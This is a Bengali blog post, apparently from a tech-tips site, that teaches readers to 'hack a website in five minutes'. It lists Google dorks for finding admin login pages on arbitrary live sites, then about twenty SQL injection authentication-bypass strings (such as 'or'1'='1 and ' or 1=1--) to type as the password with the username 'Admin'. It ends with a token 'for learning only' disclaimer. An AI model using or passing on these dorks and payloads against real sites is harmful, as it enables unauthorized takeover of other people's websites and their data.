meeeeeeeeeeeeeeeeeeeeeeee

শিরোনাম দেখেই আশা করি বুঝে গেছেন পোষ্টটি কি নিয়ে ? জ্বী, ঠিকই ধরেছেন। আজ দেখাব মাত্র ৫ মিনিটে কিভাবে একটি ওয়েবসাইট বস্কাইয়া (হ্যাকিং) দিতে হয়। খুবই মজা হবে। আমার মনে হয় উৎসুক জনতা এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে। পোষ্ট তো করেই যাচ্ছি কিন্তু মন্তব্যই পাই না। দেখা যায় যে একটা পোষ্ট করার কিছুক্ষণ পর দেখা যায় ৩০০-৪০০ জন ভিজিটর পড়ে ফেলেছে। কিন্তু ঐ সময় দেখা যায় মন্তব্য এসেছে ১, ২ বা ৫টা। এই ভাবে চললে লিখতে কার ভাল লাগে। আপনাদের তো আর বলি না লিখতে পোষ্টটি পড়ে সব শিখ ফেলেছেন কিন্তু এরপর কাজটাও সেরে ফেলেছেন। কিন্তু কিন্তু একটা মন্তব্য করার মতো আর সময় পেলেন না। এই জন্যই আমরা বাঙ্গলী। যাক চলুন পোষ্টে……….। শিখে ফেলি কিভাবে ৫ মিনিটে একটা ওয়েবসাইট হ্যাকিং করতে হয়।

এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।

• প্রথমে আমরা যাব www.google.com এ।
• এবার Search বক্সে যে কোন একটি Google dork লিখুন।
• আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।

"inurl:admin.asp"  

"inurl:login/admin.asp"  

 "inurl:admin/login.asp" 

"inurl:adminlogin.asp"

 "inurl:adminhome.asp" 

 "inurl:admin_login.asp" 

 "inurl:administratorlogin.asp" 

"inurl:login/administrator.asp"

 "inurl:administrator_login.asp"

"inurl: admin.php"

   "inurl: login/admin.php" 

 "inurl: admin/login.php" 

 "inurl: adminlogin.php" 

 "inurl: adminhome.php" 

 "inurl: admin_login.php" 

 "inurl: administratorlogin.php" 

 "inurl: login/administrator.php" 

 "inurl: administrator_login.php"

• এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
• যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…

welcome to xxxxxxxxxx administrator panel 

username :

 password :

• এখানে ইউজার নেম দিনঃ “Admin”
• তাহলে পাসওয়ার্ড কি দিবেন ? সমস্যা নাই আমিও নাই 
• নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিন।

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1-- 

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1' 

• তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…

username:Admin 

 password:'or'1'='1

• এবার submit এ ক্লিক করুন।
• ব্যস কাজ শেষ আপনি এখন রাজা যদি ছেলে হন আর মেয়ে হলে রাণী 

মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।

হ্যাকিং শুধু মাত্র শিখার জন্য। এটির কষ্ট করে অপব্যবহার করবেন না। এই পোষ্টের অপব্যবহারে কেউ ক্ষতি গ্রস্থ হলে টিজে এর জন্য দায়ী নয়।

সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকুন ও ভাল রাখুন আপনার পাশের লোকটিকে। আল্লাহ হাফেজ………